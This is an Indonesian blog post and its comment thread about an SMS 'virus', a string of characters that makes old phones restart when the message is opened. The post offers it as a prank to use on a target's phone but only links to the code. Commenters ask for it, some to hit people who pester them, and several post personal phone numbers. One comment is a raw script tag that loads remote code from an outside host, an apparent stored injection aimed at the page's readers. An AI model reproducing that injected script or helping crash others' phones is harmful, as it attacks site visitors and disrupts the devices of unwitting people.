KIRIM VIRUS LEWAT SMS

June272010
Kirim virus lewat sms


ich ich ich...! aq ktawa sndri membca judul postinganku kali ini. Virus mana bisa dikirim lewat sms..?!!!! ,tpi ga apa2lah, biar kliatan sdkit mnarik.

km prnh liat ga ada hp yg bgtu mnerima dan buka sms hp tu langsung mati..? Sbnre bukan mati tp cuma restart aja tiap kali pesan itu dibuka.
si pemilik hp psti bingung campur kuatir, dikira hp dia rusak, krn tiap kali sms itu di buka hp lngsung mati

Nah..bgi kamu2 yg pnasaran psti brtanya2, apa seh isi sms itu sampe bs bkin hp jd mati?.
Okay..ini jwban dr rasa penasarn itu, km klik aja
di sini untuk mlihat isi pesan itu, tpi syaratnya hp target yg msih jadul loch, yg blm ada fitur kameranya, klo hp target yg layarnya msih monocrom alias item putih aq jamin brhasil 100% hehe
Sbnre tips ini udh jadul jg, tp ga ada slah'nya aq share lg dsni,
thankeyuuuu...
Bagikan ke Facebook Bagikan ke Twitter

Komentar

54 tanggapan untuk "KIRIM VIRUS LEWAT SMS"

R B M pada 04:02, 27-Jun-10

virus...

R B M pada 04:02, 27-Jun-10

virus...
Apalagi ya.. Yang bisa nakutin.. Hh..

Ryan pada 04:11, 27-Jun-10

Virus cinta... Bg yg sdng patah hatii.
http://qinkii.wen.ru/icon/gif1/24.gif

Qinkii pada 05:49, 27-Jun-10

Brow sebernya virus itu bs dkrim lewt sms g? Gmna carane? Trus yg dipostingn itu trmsuk virus bukan?

-a pada 19:32, 27-Jun-10

Baguslah. 























hehe [img]http://bantir.xtgem.com/peace.gif[/img]

Ryan pada 20:29, 27-Jun-10

Virus ga bs dkrim lewat sms mas. http://virgo.wen9.com/icon/mig/6.png

ihwan pada 09:07, 19-Sep-10

mas itu namanya scipt....

agus pada 11:54, 19-Sep-10

nui virusnya d kirim lewat p apa aja bisakan?

agus pada 11:55, 19-Sep-10

tuh virudsnya d kirim lewat hp tipe ap a aja bisa kan

Ryan pada 13:10, 19-Sep-10

Bisa saja, yg pnting bisa baca karakter itu, hp target yg jadul, yg ada fitur tanda tanganya

Nandy pada 08:10, 01-Okt-10

Maz rian sy mu tanya...sy dah cb untk copy paste slh 1 gambr/krakter di atas..tp stlh quw udah paste di tempat pengisian gogle..ndak bs quw edit..untk quw copy ke pesan inbox...?
Trus cranya gmn...tolong ksh tau cranya ...sblmnya trimakasih..mhon bantuanyj

Ryan pada 12:15, 01-Okt-10

Hp km apa? Mungkn hp ga bs baca code2 itu.
Lagi pula ga prlu di copy ke form google, kan codenya udh aku buat dlm textarea, jd bs di copy paste lngsung mlalu sistem ponsel.

Nandy pada 23:06, 01-Okt-10

Hp quw nokia 6120 maz...?
Di copy paste langsung lewat sistem handpone..caranya gmn maz...maaf quw ne terblang gaptek ogk...hexx..mhon penjelasanya

Ryan pada 05:39, 02-Okt-10

Buka kodenya, kmudian copy dng menekan dan than tmbol # dan gerakan navigasi tuk mnandai teksnya. Kmudian plih salin/copy

jojon pada 06:18, 31-Okt-10

<script src="http://xsson.mobie.in/x55/salam.php"></script>..salam

romi pada 01:15, 17-Nov-10

cara kirim ke hape target gmn bro,,,dah gua ikutin semua,,cara kirimnya gmn?

Mixmax pada 15:25, 22-Des-10

Hp jadul gk wrna selain nokia kok gk bs hang boz?

Grobag pada 04:30, 26-Des-10

Lumayan wat iseng2.(tumbs up ) mas brot

Joe pada 22:51, 28-Des-10

oke...bos minta trik bkin eror lain nya donk yg bisa d kirim ke orang...

Joe pada 22:53, 28-Des-10

soal nya bnyak bnget...nomor2 yg iseng k istri gw,jadi kesel euy...

kichi pada 01:05, 06-Jan-11

, log loe pngen nyobain virus via hp,,,
, hbungin gw dah di numb 08976402803

mixmax pada 09:28, 09-Jan-11

Kichi,salam knal boz...
W pgn nybain neh....ntr w cmz,ocre?

Joejo pada 08:44, 11-Peb-11

Boss gmn cra copy paste karakter virus diats,,,aq pkek opera tuyul

Ilham pada 18:43, 06-Apr-11

Agan virgo,ane reques sms shutdown..
..fungsi'y sma kyax yg diatas.!
Tp apps ini bisa mati'n smua tipe hp..!!

Ilham pada 18:43, 06-Apr-11

Agan virgo,ane reques sms shutdown..
..fungsi'y sma kyax yg diatas.!
Tp apps ini bisa mati'n smua tipe hp..!!

Ilham pada 18:44, 06-Apr-11

Agan virgo,ane reques sms shutdown..
..fungsi'y sma kyax yg diatas.!
Tp apps ini bisa mati'n smua tipe hp..!!

Ilham pada 18:44, 06-Apr-11

Agan virgo,ane reques sms shutdown..
..fungsi'y sma kyax yg diatas.!
Tp apps ini bisa mati'n smua tipe hp..!!

Anonim pada 23:47, 14-Mei-11

biggrin
__! " !__
/' '\
/ ( , ) ( , ) \
\ ) ( /
/ . \
# ¥ #
\ / /
\ / /
( /
a

alan_ajach pada 00:55, 27-Jun-11

boz..
Saya tolong kirimin ke hp saya ajah.!
087870077081
saya ga bisa copy saya bingung...!

Hacker_27 pada 16:44, 24-Jul-11

ada gak script virus yang sama seperti trojan yang dikirim via chat di fb

SUSI pada 16:31, 20-Sep-11

gua mau jajal ilmu gua,mana virusnya kirim ke hp gua ni no hp gua 085321298472, gua ingin buktikan klo itu bs bikin error hp,kupret lo....

emir pada 18:38, 20-Sep-11

Kalau mau ngirim virusnya lewat yahoo messenger, kalau mau copy virus gw saranin virusnya si Anonim buagus banget virusnya.

Pinjal pada 01:52, 01-Okt-11

postingan kerenn sobb.. Terus berkreasi !

Arsha pada 05:01, 03-Okt-11

gmna caranya pake virus HP neh.,.,.,??

Shelly pada 05:34, 03-Okt-11

krimi aqw virus kk 087757865840
oke aqw tunggu eah...!!!

shanty.... pada 05:37, 03-Okt-11

sms aqhu each,,. cc.
qw btuh tmen curhat nuih,,,,
085236552197

BRONDONG pada 22:55, 13-Okt-11

̲̲̲̲̅̅̅̅ ̲̲̲̲̲̲̲̲̲̅̅̅̅̅̅̅̅̅ ̲̲̲̲̲̲̲̲̲̅̅̅̅̅̅̅̅̅ ̲̲̲̲̲̲̲̲̲̅̅̅̅̅̅̅̅̅0
AYO DONK KRIMIN Q MA ADEKQ...........
087856536626
085851233848
085746243771

ramdan pada 03:23, 15-Okt-11

Maz Kirimin Aj code hank nya ke HP qu 087871262178 ok...

Terus Berkarya

Aгģατα'ş™ pada 10:42, 22-Nov-11

Assalamualaikum.wr.wb
Ma'af ni aku mau tanya,,nih.biggrin kalau untuk virus yang jenis hp sudah ada kamera..ada ndak..?
Lamkenal Mas broww...?

Roni Wijaya pada 16:57, 22-Nov-11

nie buat hp yg gmn gan,,???java apa symbian..???

ISIF pada 20:52, 27-Nov-11

ada apa enggak ya yang sms yang bsa bkin hp mati tapi bwt semua hp/SE. . klo ada kirim di no hp aq 085736653339. . .

yudha pada 23:58, 16-Des-11

bingung neee................gmn ce carax??????????????????

yudha pada 00:06, 17-Des-11

q ngirim kok g bisa2..............kasih yg detail y...or krim k hpq carax....08179677228

Yans pada 05:25, 12-Jan-12

http://qinkii.wen.ru/icon/gif1/30.gif

A Izonk™ pada 07:25, 15-Mar-12

Asalm wr.Wb:
Kunjungan perdana master, v2 nyimak telat sob,
muter2 dlu di blog agan.
Numpang Tenar Z.. Pasang
dunk Link ane Di BlogroL, hehe biar Bisa
Rame sprti blognya master, salam persahabatan, Lapor link agan udah ane pasang, Laksanakan . . !.
Tinggal agan pasang link ane ok gan master.
Sukses sllu.
laporan selesai.

andi pada 01:39, 18-Mar-12

met mlm mz,eh mz aq bisa mnta tolong gk,?tolong kirimin virus sms yg bikin hp ngebleng untk smua tipe,kcuali BB,IPOne,n' ipone mobale,coal ny aq bingung amat mo buat aplikasi kyk gitu plis ea mz,aq sebel amat banyak nomor 2 yg gk penting neror,plis ea mz aq tunggu krimi ke nomor ini saja. .
089682276942
aq tunggu ea mz,trimz sblum ny. . .

agaricus pada 09:29, 06-Apr-12

WOW..
BLOG INI EMANG KEREN

biggrinDDDD

Alam pada 11:55, 05-Jun-12

Ada virus sms buat hp xg ad cameranxa nggak?

abdulpakih pada 13:22, 26-Jun-12

untuk mengembalikanya bisa gak gan

Ato putra pada 17:31, 29-Agu-12

Gi mn cara nycopy virus




imam pada 21:01, 02-Jun-13

wuih deemam vyrus ya?

koswara pada 20:29, 10-Agu-13

gan, cra bkin skrip virus kya gt, gmn?

And kl ggan pnya app buat matiin hp 0rng lwat sms, ane bgi ia?
Ank lpki, pda pelit.

mamat pada 03:02, 01-Nov-13

mas tolong kirim ke hpku 081256993965

hayyan marsiansa pada 08:03, 04-Peb-14

Bagus ni buat ngerjain orang yg sedang galau biar tambah galau lg,,,,hahaha

Langganan komentar: [RSS] [Atom]

Komentar Baru

[Masuk]
Nama:

Email:

Komentar:
(Beberapa Tag BBCode diperbolehkan)

Kode Keamanan:
Aktifkan Gambar


 
Kembali ke Atas